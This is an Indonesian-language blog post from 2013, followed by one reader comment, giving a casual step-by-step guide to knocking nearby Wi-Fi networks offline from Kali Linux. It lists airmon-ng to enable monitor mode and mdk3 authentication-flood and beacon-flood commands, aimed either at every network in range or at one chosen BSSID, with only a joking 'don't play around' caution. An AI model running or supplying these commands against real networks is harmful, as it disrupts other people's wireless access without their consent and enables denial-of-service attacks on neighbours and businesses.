Monday 12 August 2013

hack wifi di kali linux

  Malam agan semua nya, kali ini ane ingin berbagi agak menyeramkan ehhh buset dah...apa'an tuh serem? emang ada setan nya apa wkwkwkw...
Pasti agan-agan bertanya dapat dari mana nih caranya ya??? yang jelas ane jawabnya dengan sederhana ya google dong emangnya dapet dari warteg jiakakakak, dah ngoceh-ngoceh mulu nih kerjaan nya kalo posting, ok gan sekarang kita mulalai keTKP ya?

Sibbel apa'an tuh? ane jg ga tau gan wkwkwk , kata orang-orang sih itu buat membanjiri wifi suapaya tidak bisa terconeksi gan, kali ini ane mau shear bagaimana kita membajiri wifi yang ada di sekitar agan.

Udah pada ga sabar ya gan? heheheheh
Pertama-tama kita aktifkan wifinya ke mode monitor :
airmon-ng start wlan0
kalo sudah tinggal ketikan saja :
semua wireless yang di temukan
mdk3 mon0 a buka terminal baru lagi
mdk3 mon0 b

hanya wireless yang ditentukan
mdk3 mon0 a -t (bssid) open new terminal
mdk3 mon0 b -t (bssid)

nah liat tuh apa yang terjadi di wifi agan ...??? hehehehehe jangan di buat main-main ya gan.
maaf ya kalo masih ada kesalahan postingan yang penting berbagi itu indah
ama jangan lupa komentnya gan...itu penting buat masukan ane kedepan.

1 comments:

Unknown said...

gambarnya mana gan ,sama sedikit di uraikan lagi
oke gan
salam kenal mampir nih diblog ane setyoadiprabowo.blogspot.com :)

Post a Comment

◄ Newer Post Older Post ►
 

Copyright 2012 Ivan Andhika Muslim Seo Elite by BLog Ivan | Blogger Templates